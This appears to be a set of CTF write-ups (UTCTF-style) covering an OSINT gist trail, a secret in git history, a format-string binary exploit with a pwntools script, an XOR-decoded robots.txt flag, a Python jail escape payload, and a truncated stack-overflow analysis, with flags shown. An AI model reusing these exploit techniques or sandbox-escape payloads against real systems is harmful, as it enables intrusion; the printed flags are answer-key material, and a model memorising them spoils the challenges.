Every trail has a beginning. This one starts here:

https://gist.github.com/garvk07/3f9c505068c011e0fd6abd9ddf56aecb

Osint Path

First, base on the description, I try to open this github link and find a .txt file:

We can see a Base64 string in this file:

aHR0cHM6Ly9naXN0LmdpdGh1Yi5jb20vZ2FydmswNy9iYTQwNjQ2MGYyZTkzMmI1NDk2Y2EyNTk3N2JlMjViZQ==

Next, checking all gists, we found three other files: poem.txt, analysis.txt, and final.txt:

Checking the remaining files:

• poem.txt: This file has a poem and a URL link to analysis.py:

    Gather your wits, the path winds on from here,
    In shadows deep, the truth is never clear,
    Secrets hide where few would dare to look,
    Three letters follow, open up the book.
  
    p.s. https://gist.github.com/garvk07/963e70be662ea81e96e4e63553038d1a
  

  Taking a look at the poem, we find the hint “Three letters follow, open up the book.”

• analysis.py:

    # A curious little script...
    # Nothing to see here.
    # 68747470733a2f2f676973742e6769746875622e636f6d2f676172766b30372f3564356566383539663533306333643539336134613363373538306432663239
    # Move along.
  
    def analyse(data):
        return data[::-1]
  
    results = analyse("dead beef")
    print(results)
  

  This Python source code contains a hex string in a comment:

    68747470733a2f2f676973742e6769746875622e636f6d2f676172766b30372f3564356566383539663533306333643539336134613363373538306432663239
  

• final.txt: This file contains a string that looks like the flag format

    You've reached the end of the trail. Your reward:
    hgsynt{s0yy0j1at_gu3_pe4jy_ge41y}
  

Decoding the gathered information (except final.txt) shows each file points to the next. The final token is ROT13-encoded, so we decode it.

Source code:

#!/usr/bin/env python3

"""
Sample output:
[+] Step 0 - Start URL: https://gist.github.com/garvk07/3f9c505068c011e0fd6abd9ddf56aecb
[+] Step 1 - start.txt: Base64 -> https://gist.github.com/garvk07/ba406460f2e932b5496ca25977be25be
[+] Step 2 - poem.txt: embedded URL -> https://gist.github.com/garvk07/963e70be662ea81e96e4e63553038d1a
[+] Step 3 - analysis.py: hex -> https://gist.github.com/garvk07/5d5ef859f530c3d593a4a3c7580d2f29
[+] Step 4 - final.txt: ROT13 token -> hgsynt{s0yy0j1at_gu3_pe4jy_ge41y}
[+] FLAG: utflag{f0ll0w1ng_th3_cr4wl_tr41l}
"""

import base64
import codecs
import json
import re
import urllib.request
from urllib.parse import urlparse


START_URL = "https://gist.github.com/garvk07/3f9c505068c011e0fd6abd9ddf56aecb"


def extract_gist_id(url: str) -> str:
    path_parts = [part for part in urlparse(url).path.split("/") if part]
    if not path_parts:
        raise ValueError(f"Cannot extract gist id from URL: {url}")
    return path_parts[-1]


def fetch_gist(gist_url: str) -> dict:
    gist_id = extract_gist_id(gist_url)
    api_url = f"https://api.github.com/gists/{gist_id}"
    request = urllib.request.Request(
        api_url,
        headers={
            "Accept": "application/vnd.github+json",
            "User-Agent": "ctf-breadcrumb-solver",
        },
    )
    with urllib.request.urlopen(request, timeout=20) as response:
        return json.load(response)


def first_file_content(gist_obj: dict) -> tuple[str, str]:
    files = gist_obj.get("files", {})
    if not files:
        raise ValueError("No files found in gist")
    filename, metadata = next(iter(files.items()))
    content = metadata.get("content", "")
    return filename, content


def extract_base64_url(text: str) -> str:
    compact = "".join(line.strip() for line in text.splitlines())
    candidates = re.findall(r"[A-Za-z0-9+/=]{40,}", compact)
    if not candidates:
        raise ValueError("No Base64 candidate found")
    decoded = base64.b64decode(candidates[0]).decode()
    if not decoded.startswith("http"):
        raise ValueError("Decoded Base64 does not look like URL")
    return decoded


def extract_url(text: str) -> str:
    match = re.search(r"https://gist\.github\.com/[\w-]+/[0-9a-f]{32}", text)
    if not match:
        raise ValueError("No gist URL found")
    return match.group(0)


def extract_hex_url(text: str) -> str:
    compact = "".join(line.strip() for line in text.splitlines())
    candidates = re.findall(r"[0-9a-fA-F]{40,}", compact)
    if not candidates:
        raise ValueError("No hex candidate found")
    decoded = bytes.fromhex(candidates[0]).decode()
    if not decoded.startswith("http"):
        raise ValueError("Decoded hex does not look like URL")
    return decoded


def extract_rot13_flag(text: str) -> tuple[str, str]:
    match = re.search(r"[a-z]{4,}\{[^}\n]+\}", text)
    if not match:
        raise ValueError("No flag-like token found")
    encoded_flag = match.group(0)
    decoded_flag = codecs.decode(encoded_flag, "rot_13")
    return encoded_flag, decoded_flag


def main() -> None:
    print("[+] Step 0 - Start URL:", START_URL)

    gist1 = fetch_gist(START_URL)
    file1, content1 = first_file_content(gist1)
    url2 = extract_base64_url(content1)
    print(f"[+] Step 1 - {file1}: Base64 -> {url2}")

    gist2 = fetch_gist(url2)
    file2, content2 = first_file_content(gist2)
    url3 = extract_url(content2)
    print(f"[+] Step 2 - {file2}: embedded URL -> {url3}")

    gist3 = fetch_gist(url3)
    file3, content3 = first_file_content(gist3)
    url4 = extract_hex_url(content3)
    print(f"[+] Step 3 - {file3}: hex -> {url4}")

    gist4 = fetch_gist(url4)
    file4, content4 = first_file_content(gist4)
    encoded_flag, flag = extract_rot13_flag(content4)
    print(f"[+] Step 4 - {file4}: ROT13 token -> {encoded_flag}")
    print(f"[+] FLAG: {flag}")


if __name__ == "__main__":
    main()

Run result:

$ python3 solve.py
[+] Step 0 - Start URL: https://gist.github.com/garvk07/3f9c505068c011e0fd6abd9ddf56aecb
[+] Step 1 - start.txt: Base64 -> https://gist.github.com/garvk07/ba406460f2e932b5496ca25977be25be
[+] Step 2 - poem.txt: embedded URL -> https://gist.github.com/garvk07/963e70be662ea81e96e4e63553038d1a
[+] Step 3 - analysis.py: hex -> https://gist.github.com/garvk07/5d5ef859f530c3d593a4a3c7580d2f29
[+] Step 4 - final.txt: ROT13 token -> hgsynt{s0yy0j1at_gu3_pe4jy_ge41y}
[+] FLAG: utflag{f0ll0w1ng_th3_cr4wl_tr41l}

We’re planning on deploying some new static sites for our officers. We’ve cloned a template from Hugo’s Static Site Generator (SSG). Can you make sure that our website is clean before it’s deployed?

https://github.com/Jarpiano/utctf-profile

Osint Path

Based on the description, we first cloned the GitHub repository; here is the repository tree:

tree.sh

Next, try checking the git log:

$ git log --oneline --max-count=30
ff2ac47 (HEAD -> main, origin/main, origin/HEAD) updated site
a1546af added key file to integrate with AWS
b5b893f new clone
3d3bbd7 Support adding content after "about" section (#994)
0450553 Move counterdev to the end of body (#993)
b476d77 SFMono-Regular is not recognized by Firefox, uses the standard name "SF Mono" (#990)
a3d7d40 Add Counter.dev analytics support (#988)
eea6dfd Adds `rel` parameter to the social icons configuration documentation (#987)
145401d Added TOC support (#985)
cb13ec4 Fix pagination (#979)
a5fc33e Upstreaming updates to theme to be compatible with Hugo v0.146.0 >= (#981)
70c0792 Remove trailing space from headline. (#970)
4b61a60 fix: don't wrap external link CSS content (#967)
6bc0059 Catalan il8n (#957)

From the result, we can see a suspicious commit:

a1546af added key file to integrate with AWS

Inspecting that commit shows:

$ git show --name-status a1546af
commit a1546afedb6edeffa9227d70b1f5e110bda9f7e6
Author: Jarpiano <barcousticjp@gmail.com>
Date:   Thu Mar 12 10:33:12 2026 -0500

    added key file to integrate with AWS

A       static/fonts/secret-keys/AWS-key.txt

The result includes a path to AWS-key.txt; showing the file’s contents revealed the flag:

$ git show a1546af:static/fonts/secret-keys/AWS-key.txt
utflag{n07h1n6_70_h1d3}

This program is very friendly. It just wants to say hello. Nothing suspicious going on here at all. Download the binary and run it locally.

Challenge Overview

This challenge provides us with a binary file. First, we try to check this binary:

$ file vuln               
vuln: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=3b8bb05d807ee592c2224e7d1828fba58682d866, for GNU/Linux 3.2.0, not stripped

$ checksec --file=vuln
[*] '/home/kali/Desktop/wargame/joy/vuln'
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        PIE enabled
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No

This result means:

• The binary is a 64-bit ELF with PIE enabled and symbols present (not stripped).
• NX prevents executing injected shellcode on the stack.
• PIE randomizes the code base; this is not an obstacle here since we do not need complex ROP.
• There is no stack canary, but there is no practical overflow primitive because fgets is bounded.
• Full RELRO prevents easy GOT overwrites.
• SHSTK/IBT (CET) are enabled, which increases the difficulty of control-flow hijacking.

Next, decompile the binary with IDA, we can see the pseudocode of binary’s main:

int __fastcall main(int argc, const char **argv, const char **envp) {
    int v4; // [rsp+Ch] [rbp-54h] BYREF
    char s[76]; // [rsp+10h] [rbp-50h] BYREF
    int v6; // [rsp+5Ch] [rbp-4h]

    setup(argc, argv, envp);
    v6 = -559038737;
    printf("What is your name? ");
    fgets(s, 64, stdin);
    s[strcspn(s, "\n")] = 0;
    printf("Hello, ");
    printf(s);
    puts("!");
    printf("Enter the secret code: ");
    __isoc99_scanf("%u", &v4);
    if ( v4 == v6 )
        print_flag();
    else
        puts("Wrong! Nice try.");
    return 0;
}

Based on the pseudocode, the important functions to analyze are main, setup, and print_flag. We’ll inspect the disassembly to understand the program flow:

• main():

    ; int __fastcall main(int argc, const char **argv, const char **envp)
                    public main
    main            proc near               ; DATA XREF: _start+18↑o
  
    var_54          = dword ptr -54h
    s               = byte ptr -50h
    var_4           = dword ptr -4
  
    ; __unwind {
                    endbr64
                    push    rbp
                    mov     rbp, rsp
                    sub     rsp, 60h
                    mov     eax, 0
                    call    setup
                    mov     [rbp+var_4], 0DEADBEEFh
                    lea     rax, format     ; "What is your name? "
                    mov     rdi, rax        ; format
                    mov     eax, 0
                    call    _printf
                    mov     rdx, cs:stdin@GLIBC_2_2_5 ; stream
                    lea     rax, [rbp+s]
                    mov     esi, 40h ; '@'  ; n
                    mov     rdi, rax        ; s
                    call    _fgets
                    lea     rax, [rbp+s]
                    lea     rdx, reject     ; "\n"
                    mov     rsi, rdx        ; reject
                    mov     rdi, rax        ; s
                    call    _strcspn
                    mov     [rbp+rax+s], 0
                    lea     rax, aHello     ; "Hello, "
                    mov     rdi, rax        ; format
                    mov     eax, 0
                    call    _printf
                    lea     rax, [rbp+s]
                    mov     rdi, rax        ; format
                    mov     eax, 0
                    call    _printf
                    lea     rax, s          ; "!"
                    mov     rdi, rax        ; s
                    call    _puts
                    lea     rax, aEnterTheSecret ; "Enter the secret code: "
                    mov     rdi, rax        ; format
                    mov     eax, 0
                    call    _printf
                    lea     rax, [rbp+var_54]
                    mov     rsi, rax
                    lea     rax, aU         ; "%u"
                    mov     rdi, rax
                    mov     eax, 0
                    call    ___isoc99_scanf
                    mov     edx, [rbp+var_54]
                    mov     eax, [rbp+var_4]
                    cmp     edx, eax
                    jnz     short loc_13A8
                    mov     eax, 0
                    call    print_flag
                    jmp     short loc_13B7
    ; ---------------------------------------------------------------------------
  
    loc_13A8:                               ; CODE XREF: main+CF↑j
                    lea     rax, aWrongNiceTry ; "Wrong! Nice try."
                    mov     rdi, rax        ; s
                    call    _puts
  
    loc_13B7:                               ; CODE XREF: main+DB↑j
                    mov     eax, 0
                    leave
                    retn
    ; } // starts at 12CB
    main            endp
  

  • Based on the assembly, the program performs these steps at runtime:
    • Configure stdio buffering in setup().
    • Initialize stack local variable to 0xDEADBEEF.
    • Prompt for name.
    • Read name with fgets into stack buffer.
    • Strip newline using strcspn.
    • Print greeting via printf("Hello, ") then **printf(name)
    • Prompt for secret code.
    • Read unsigned integer using scanf("%u", &user_code).
    • Compare user_code with local secret (0xDEADBEEF).
    • If equal, call print_flag(), else print failure message.
  • Key details from the assembly:
    • mov DWORD PTR [rbp-0x4],0xdeadbeef stores the expected secret on the stack.
    • The name buffer is at [rbp-0x50] and is read with fgets(..., 0x40, stdin).
    • The newline is removed using strcspn and a null terminator is written.
    • printf(name) introduces an uncontrolled format-string vulnerability.
    • The user-supplied secret is read at [rbp-0x54] via scanf("%u", ...).
    • Control flow:
      • if equal → call print_flag
      • else → puts("Wrong! Nice try.")
• setup(): This function will calls setvbuf(stdout, NULL, _IONBF, 0) and same for stdin in order to deterministic I/O behavior for interactive challenge.

  ; __int64 __fastcall setup(_QWORD, _QWORD, _QWORD)
                public setup
  setup           proc near               ; CODE XREF: main+11↓p
  ; __unwind {
                endbr64
                push    rbp
                mov     rbp, rsp
                mov     rax, cs:stdout@GLIBC_2_2_5
                mov     ecx, 0          ; n
                mov     edx, 2          ; modes
                mov     esi, 0          ; buf
                mov     rdi, rax        ; stream
                call    _setvbuf
                mov     rax, cs:stdin@GLIBC_2_2_5
                mov     ecx, 0          ; n
                mov     edx, 2          ; modes
                mov     esi, 0          ; buf
                mov     rdi, rax        ; stream
                call    _setvbuf
                nop
                pop     rbp
                retn
  ; } // starts at 1209
  setup           endp
  

• print_flag(): This function stores obfuscated bytes on stack. Then it try loops index i = 0..0x1b (28 bytes). For each byte: decoded = encoded_byte ^ 0x42, then putchar(decoded). Finally, it prints newline. This is the disassembly source code and pseudocode of this function: ```asm ; __int64 print_flag(void) public print_flag print_flag proc near ; CODE XREF: main+D6↓p

var_20 = qword ptr -20h var_18 = qword ptr -18h var_C = qword ptr -0Ch var_4 = dword ptr -4

; __unwind { endbr64 push rbp mov rbp, rsp sub rsp, 20h mov rax, 243925232E243637h mov rdx, 36311D36762F3072h mov [rbp+var_20], rax mov [rbp+var_18], rdx mov rax, 252C733036311D36h mov rdx, 3F26712976712E1Dh mov [rbp+var_18+4], rax mov [rbp+var_C], rdx mov [rbp+var_4], 0 jmp short loc_12B8 ; —————————————————————————

loc_129D: ; CODE XREF: print_flag+6C↓j mov eax, [rbp+var_4] cdqe movzx eax, byte ptr [rbp+rax+var_20] xor eax, 42h movzx eax, al mov edi, eax ; c call _putchar add [rbp+var_4], 1

loc_12B8: ; CODE XREF: print_flag+4B↑j cmp [rbp+var_4], 1Bh jle short loc_129D mov edi, 0Ah ; c call _putchar nop leave retn ; } // starts at 1250 print_flag endp

```c
int print_flag() {
    _DWORD v1[7]; // [rsp+0h] [rbp-20h] BYREF
    int i; // [rsp+1Ch] [rbp-4h]

    qmemcpy(v1, "76$.#%9$r0/v", 12);
    *(_QWORD *)&v1[3] = 0x252C733036311D36LL;
    *(_QWORD *)&v1[5] = 0x3F26712976712E1DLL;
    for ( i = 0; i <= 27; ++i )
        putchar(*((_BYTE *)v1 + i) ^ 0x42);
    return putchar(10);
}

Exploitation Process

Attempt 1: Memory corruption route

First we try some classical strategies. However this is not the correct path and here is the reason:

• stack overflow via name buffer? No: fgets(name, 0x40, ...) for a 64-byte destination is bounded.
• GOT overwrite? No: Full RELRO.
• shellcode injection? No: NX.
• ret2win by direct RIP overwrite? No primitive because no overflow.

Attempt 2: Logic bypass

Looking into the disassembly, we can see some special things of this binary:

• local secret = 0xDEADBEEF
• compared against %u input

Trying to convert the local secret into decimal:

0xDEADBEEF = 3735928559

So, since we will give the flag if our secret matched with the local secret of this binary, the input is 3735928559 will directly triggers print_flag and prints the flag:

$ ./vuln
What is your name? aaa
Hello, aaa!
Enter the secret code: 3735928559
utflag{f0rm4t_str1ng_l34k3d}

Attempt 3: Format-string based leak

Based on the analysis, this binary has a format-string vulnerability at printf(name). The exploitation path is:

• printf(name) allows reading stack values.
• We brute-forced positional %i$p (using %%%d\$p) and discovered that offset=17 leaks a word containing deadbeef in the low 32 bits.

    for i in $(seq 1 80); do
    out=$( (printf "%%%d\$p\n0\n" "$i"; ) | ./vuln 2>/dev/null )
    if echo "$out" | grep -qi deadbeef; then
        echo "offset=$i"
        echo "$out"
        break
    fi
    done
  

  Output:

    offset=17
    What is your name? Hello, 0xdeadbeef64181cd0!
    Enter the secret code: Wrong! Nice try.
  

• This enables scriptable extraction of secret instead of hardcoding.

This is the exploit code:

#!/usr/bin/env python3
from pwn import *
import re

# -----------------------------------------------------------------------------
# Configuration
# -----------------------------------------------------------------------------
BINARY_PATH = "./vuln"
LEAK_OFFSET = 17  # discovered by brute force: %17$p leaks stack word with deadbeef in low dword

# Use local process (no remote for this challenge)
context.binary = ELF(BINARY_PATH)
context.log_level = "info"

# -----------------------------------------------------------------------------
# Helper: parse leaked pointer-like token and recover lower 32-bit secret
# -----------------------------------------------------------------------------
def parse_secret_from_line(line: bytes) -> int:
    """
    Extract first 0x... token from greeting line and return low 32 bits.
    Example token: 0xdeadbeef64181cd0 -> low32 could vary by layout,
    but for this challenge observed word contains deadbeef in lower dword for offset 17.
    """
    m = re.search(rb"0x[0-9a-fA-F]+", line)
    if not m:
        raise ValueError("No hex token leaked from format string")

    leaked_value = int(m.group(0), 16)
    low = leaked_value & 0xFFFFFFFF
    high = (leaked_value >> 32) & 0xFFFFFFFF

    if low == 0xDEADBEEF:
        return low
    if high == 0xDEADBEEF:
        return high

    return low

# -----------------------------------------------------------------------------
# Main exploit routine
# -----------------------------------------------------------------------------
def exploit_local() -> str:
    io = process(BINARY_PATH)

    # Step 1: trigger format-string leak from name prompt
    io.sendlineafter(b"What is your name? ", f"%{LEAK_OFFSET}$p".encode())

    # Step 2: capture greeting line containing the leaked pointer
    # Program prints: "Hello, <expanded_format>!"
    hello_line = io.recvline_contains(b"Hello, ")
    log.info(f"Greeting line: {hello_line!r}")

    # Step 3: recover candidate secret from leaked word
    secret = parse_secret_from_line(hello_line)
    log.success(f"Recovered secret candidate (uint32): {secret} (0x{secret:08x})")

    # Step 4: send the secret as decimal for scanf("%u", ...)
    io.sendlineafter(b"Enter the secret code: ", str(secret).encode())

    # Step 5: read final output and extract flag
    final_output = io.recvall(timeout=1).decode(errors="ignore")
    print(final_output)

    # Best-effort return first utflag-like token if present
    flag_match = re.search(r"utflag\{[^}]+\}", final_output)
    return flag_match.group(0) if flag_match else "FLAG_NOT_FOUND"


if __name__ == "__main__":
    flag = exploit_local()
    print(f"[+] Flag: {flag}")

Try to run this code and we will get the same flag as Attempt 2.

$  /home/kali/Desktop/wargame/.venv/bin/python exploit.py
[*] '/home/kali/Desktop/wargame/joy/vuln'
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        PIE enabled
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No
[+] Starting local process './vuln': pid 29154
[*] Greeting line: b'Hello, 0xdeadbeeffa8f0cd0!'
[+] Recovered secret candidate (uint32): 3735928559 (0xdeadbeef)
[+] Receiving all data: Done (29B)
[*] Process './vuln' stopped with exit code 0 (pid 29154)
utflag{f0rm4t_str1ng_l34k3d}

[+] Flag: utflag{f0rm4t_str1ng_l34k3d}

Technical Summary

Vulnerability classification

1. CWE-134: Uncontrolled Format String
   • printf(name) where name is attacker-controlled.
2. Insecure Hardcoded Secret / Logic flaw
   • Secret code fixed as 0xDEADBEEF and directly comparable.
3. Weak obfuscation only
   • print_flag uses trivial XOR-by-constant.

Techniques used

• Static reversing via disassembly and symbol analysis.
• Dynamic validation in runtime/GDB.
• Format-string probing and positional offset brute-force.
• Exploit automation concept with pwntools.

Challenge Source Code

Challenge’s Github Repository: hour_of_joy

After a gap year, the sequel to “Insanity Check: Redux” and “Insanity Check: Reimagined” is finally here!

The flag is in CTFd, but, as always, you’ll have to work for it.

(This challenge does not require any brute-force – as per the rules of the competition, brute-force tools like dirbuster are not allowed, there is a clear solution path without it if you know where to look.)

Osint Path

The challenge description tells us that the flag is in CTFd. Because this contest platform uses CTFd, we predicted the flag might be located somewhere on the contest site.

Inspecting the contest site, when we accessed https://utctf.live/robots.txt we found two hidden .html files: /2065467898.html and /3037802467.html:

Both files returned 404 Not Found when opened:

However, viewing the source of the two hidden files, we found a suspicious array of numbers:

This looks like XOR-encrypted data, so we wrote a script to decode it:

cipher = [2, 7, 9, 7, 8, 13, 17, 39, 85, 4, 57, 4, 93, 30, 104, 27, 44, 23, 89, 8, 30, 68, 107, 112, 54, 0, 30, 11, 2, 92, 66, 23, 31] 
key = [119, 115, 111, 107, 105, 106, 106, 110, 114, 105, 102, 106, 50, 106, 55, 122, 115, 101, 54, 106, 113, 48, 52, 57, 105, 112, 108, 100, 111, 53, 49, 114, 98]

flag = "".join([chr(c ^ k) for c, k in zip(cipher, key)]) 
print(f"Flag: {flag}")

Run result:

$ python3 solve.py
Flag: utflag{I'm_not_a_robot_I_promise}

We’ve built the world’s most secure Python sandbox. Nothing can escape. Probably. Hopefully. Run it locally:

python3 jail.py 

Analyzing Path

The challenge gives us a Python source file; first, try to open it:

import sys

_ENC = [0x37, 0x36, 0x24, 0x2e, 0x23, 0x25, 0x39, 0x32, 0x3b, 0x1d, 0x28, 0x23, 0x73, 0x2e, 0x1d, 0x71, 0x31, 0x21, 0x76, 0x32, 0x71, 0x1d, 0x2f, 0x76, 0x31, 0x36, 0x71, 0x30, 0x3f]
_KEY = 0x42

def _secret():
    return ''.join(chr(b ^ _KEY) for b in _ENC)

BANNED = [
    "import", "os", "sys", "system", "eval",
    "open", "read", "write", "subprocess", "pty",
    "popen", "secret", "_enc", "_key"
]

SAFE_BUILTINS = {
    "print": print,
    "input": input,
    "len": len,
    "str": str,
    "int": int,
    "chr": chr,
    "ord": ord,
    "range": range,
    "type": type,
    "dir": dir,
    "vars": vars,
    "getattr": getattr,
    "setattr": setattr,
    "hasattr": hasattr,
    "isinstance": isinstance,
    "enumerate": enumerate,
    "zip": zip,
    "map": map,
    "filter": filter,
    "list": list,
    "dict": dict,
    "tuple": tuple,
    "set": set,
    "bool": bool,
    "bytes": bytes,
    "hex": hex,
    "oct": oct,
    "bin": bin,
    "abs": abs,
    "min": min,
    "max": max,
    "sum": sum,
    "sorted": sorted,
    "reversed": reversed,
    "repr": repr,
    "hash": hash,
    "id": id,
    "callable": callable,
    "iter": iter,
    "next": next,
    "object": object,
}

# _secret is in globals but not documented - players must find it
GLOBALS = {"__builtins__": SAFE_BUILTINS, "_secret": _secret}

print("=" * 50)
print("  Welcome to PyJail v1.0")
print("  Escape to get the flag!")
print("=" * 50)
print()

while True:
    try:
        code = input(">>> ")
    except EOFError:
        break

    blocked = False
    for word in BANNED:
        if word.lower() in code.lower():
            print(f"  [BLOCKED] Nice try!")
            blocked = True
            break

    if blocked:
        continue

    try:
        exec(compile(code, "<jail>", "exec"), GLOBALS)
    except Exception as e:
        print(f"  [ERROR] {e}")

Based on the Python script, we identified some suspicious points:

– First, there is a secret function in this source code: python def _secret(): return ''.join(chr(b ^ _KEY) for b in _ENC)

– Next, there is a blacklist containing some banned strings: python BANNED = [ "import", "os", "sys", "system", "eval", "open", "read", "write", "subprocess", "pty", "popen", "secret", "_enc", "_key" ]

– Finally, GLOBALS is passed into exec, but it still contains _secret: python GLOBALS = {"__builtins__": SAFE_BUILTINS, "_secret": _secret}

– So we can observe that this program only blocks static strings; runtime-generated strings remain usable.

Overall, this source code contains some important points:

• _ENC is the encoded bytes array.
• _KEY = 0x42 is the XOR key.
• _secret() decodes _ENC with _KEY.
• The blacklist contains secret, but does not ban vars, chr, map, or getattr.

There is no embedded binary data, so binwalk/exiftool are not needed.

Decoding

Based on the secret function, we can decode directly by XOR with the KEY = 0x42:

''.join(chr(b ^ 0x42) for b in _ENC)

We created a payload, ran jail.py with it, and obtained the flag:

• Payload:

    name="_"+"".join(map(chr,[115,101,99,114,101,116]))
    fn=vars()[name]
    print(fn())
  

• Run result:

    $ python3 jail.py
    ==================================================
    Welcome to PyJail v1.0
    Escape to get the flag!
    ==================================================
  
    >>> name="_"+"".join(map(chr,[115,101,99,114,101,116]))
    fn=vars()[name]
    print(fn())>>> >>> 
    utflag{py_ja1l_3sc4p3_m4st3r}
  

There’s a guard that’s protecting the flag! How do I sneak past him?

Challenge Overview

The challenge provides a binary. As with other pwn challenges, the first step is to inspect the binary’s metadata:

$ file pwnable
pwnable: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=ad855ad92ecf4b31fafab1c64895b7bc268895a5, for GNU/Linux 3.2.0, not stripped

$ checksec --file=pwnable
[*] '/home/kali/Desktop/wargame/guard/pwnable'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX unknown - GNU_STACK missing
    PIE:        No PIE (0x400000)
    Stack:      Executable
    RWX:        Has RWX segments
    Stripped:   No

Trying to decompile the binary with IDA, we can find some special symbols and some suspicious interactive strings containing in it:

• main():

    int __fastcall main(int argc, const char **argv, const char **envp) {
        if ( argc == 1 )
        {
            puts("Are you not going to say hello?");
            return 0;
        }
        else
        {
            if ( atoi(argv[1]) == 1701604463 )
            {
                puts("Hi. What do you want.");
                read_input(0);
            }
            else
            {
                puts("Hi. Go away.");
            }
            return 0;
        }
    }
  

• read_input():

    __int64 __fastcall read_input(int a1) {
        char buf[32]; // [rsp+10h] [rbp-20h] BYREF
  
        read(a1, buf, 0x64u);
        if ( !strcmp(buf, "givemeflag\n") )
            puts("How rude! utflag{you're going to need a sneakier way in...}");
        else
            puts("I won't let you pass. No matter what.");
        return 0;
    }
  

• secret_function():

    __int64 secret_function() {
        _QWORD v1[3]; // [rsp+0h] [rbp-40h]
        _QWORD v2[3]; // [rsp+18h] [rbp-28h]
        int v3; // [rsp+34h] [rbp-Ch]
        char v4; // [rsp+3Bh] [rbp-5h]
        int i; // [rsp+3Ch] [rbp-4h]
  
        v4 = 50;
        v1[0] = 0x554955535E544647LL;
        v1[1] = 0x4106456D56400647LL;
        v1[2] = 0x6D4057590601456DLL;
        v2[0] = 0x466D5B6D5C065A46LL;
        *(_QWORD *)((char *)v2 + 7) = 0x4F465A5547025A46LL;
        v3 = 39;
        for ( i = 0; i < v3; ++i )
            putchar((unsigned __int8)v4 ^ *((_BYTE *)v1 + i));
        return 0;
    }
  

Examining these symbols leads to a few conclusions:

• An input-handling vulnerability appears in read_input(): the function allocates a 32-byte stack buffer but calls read with 0x64 (100) bytes. Because 100 > 32, input can overflow buf and overwrite adjacent stack memory.
• secret_function() is not called by main(), so it appears to be a hidden path that an exploit could jump to.
• The attacker must pass an argument gate in main() before read_input() is invoked.

Since the overflow exists in read_input(), we hypothesize we can overwrite the saved RIP to redirect execution to secret_function(). The secret_function() decodes a byte array in a loop and prints each byte via putchar, so redirecting control there should reveal the flag.

Before proceeding, here’s a concise summary of the binary’s control flow:

1. Check argc.
2. If no extra argument: print “Are you not going to say hello?” and exit.
3. Else parse argv[1] via atoi.
4. Subtract constant 0x656c6c6f (decimal 1701604463), which corresponds to the ASCII little-endian form of "hello".
5. If result != 0: print “Hi. Go away.” and exit.
6. If result == 0: print “Hi. What do you want.” and call read_input with that zero value as first argument.
7. read_input reads attacker input and compares to "givemeflag\n".
8. If equal: prints fake flag string.
9. Else: prints rejection message.
10. Return path is vulnerable due to stack overflow.

Binary Analysis

First, find the addresses of the binary’s symbols: secret_function() is at 0x40124f. Because the binary is non-PIE, these addresses are fixed.

$ nm -n pwnable | egrep ' main$| read_input$| secret_function$| _start$'
0000000000401080 T _start
0000000000401166 T main
00000000004011ed T read_input
000000000040124f T secret_function

Next, try disassembly all symbols of this binary:

• main():

    $ objdump -d -M intel pwnable | sed -n '/<main>:/,/^$/p'
    0000000000401166 <main>:
        401166:       55                      push   rbp
        401167:       48 89 e5                mov    rbp,rsp
        40116a:       48 83 ec 20             sub    rsp,0x20
        40116e:       89 7d ec                mov    DWORD PTR [rbp-0x14],edi
        401171:       48 89 75 e0             mov    QWORD PTR [rbp-0x20],rsi
        401175:       83 7d ec 01             cmp    DWORD PTR [rbp-0x14],0x1
        401179:       75 16                   jne    401191 <main+0x2b>
        40117b:       48 8d 05 86 0e 00 00    lea    rax,[rip+0xe86]        # 402008 <_IO_stdin_used+0x8>
        401182:       48 89 c7                mov    rdi,rax
        401185:       e8 b6 fe ff ff          call   401040 <puts@plt>
        40118a:       b8 00 00 00 00          mov    eax,0x0
        40118f:       eb 5a                   jmp    4011eb <main+0x85>
        401191:       48 8b 45 e0             mov    rax,QWORD PTR [rbp-0x20]
        401195:       48 83 c0 08             add    rax,0x8
        401199:       48 8b 00                mov    rax,QWORD PTR [rax]
        40119c:       48 89 c7                mov    rdi,rax
        40119f:       e8 cc fe ff ff          call   401070 <atoi@plt>
        4011a4:       2d 6f 6c 6c 65          sub    eax,0x656c6c6f
        4011a9:       89 45 fc                mov    DWORD PTR [rbp-0x4],eax
        4011ac:       83 7d fc 00             cmp    DWORD PTR [rbp-0x4],0x0
        4011b0:       74 16                   je     4011c8 <main+0x62>
        4011b2:       48 8d 05 6f 0e 00 00    lea    rax,[rip+0xe6f]        # 402028 <_IO_stdin_used+0x28>
        4011b9:       48 89 c7                mov    rdi,rax
        4011bc:       e8 7f fe ff ff          call   401040 <puts@plt>
        4011c1:       b8 00 00 00 00          mov    eax,0x0
        4011c6:       eb 23                   jmp    4011eb <main+0x85>
        4011c8:       48 8d 05 66 0e 00 00    lea    rax,[rip+0xe66]        # 402035 <_IO_stdin_used+0x35>
        4011cf:       48 89 c7                mov    rdi,rax
        4011d2:       e8 69 fe ff ff          call   401040 <puts@plt>
        4011d7:       8b 45 fc                mov    eax,DWORD PTR [rbp-0x4]
        4011da:       89 c7                   mov    edi,eax
        4011dc:       b8 00 00 00 00          mov    eax,0x0
        4011e1:       e8 07 00 00 00          call   4011ed <read_input>
        4011e6:       b8 00 00 00 00          mov    eax,0x0
        4011eb:       c9                      leave
        4011ec:       c3                      ret
  

  Notable points:

        401175: cmp DWORD PTR [rbp-0x14],0x1
        401179: jne 401191
        ...
        40119f: call atoi@plt
        4011a4: sub eax,0x656c6c6f
        4011ac: cmp DWORD PTR [rbp-0x4],0x0
        4011b0: je  4011c8
        ...
        4011e1: call 4011ed <read_input>
  

  Interpretation:

  • The gate is arithmetic: atoi(argv[1]) == 0x656c6c6f.
  • The decimal equivalent is 1701604463.
  • Passing this gate reaches the vulnerable read_input().
• read_input():

    $ objdump -d -M intel pwnable | sed -n '/<read_input>:/,/^$/p'
    00000000004011ed <read_input>:
        4011ed:       55                      push   rbp
        4011ee:       48 89 e5                mov    rbp,rsp
        4011f1:       48 83 ec 30             sub    rsp,0x30
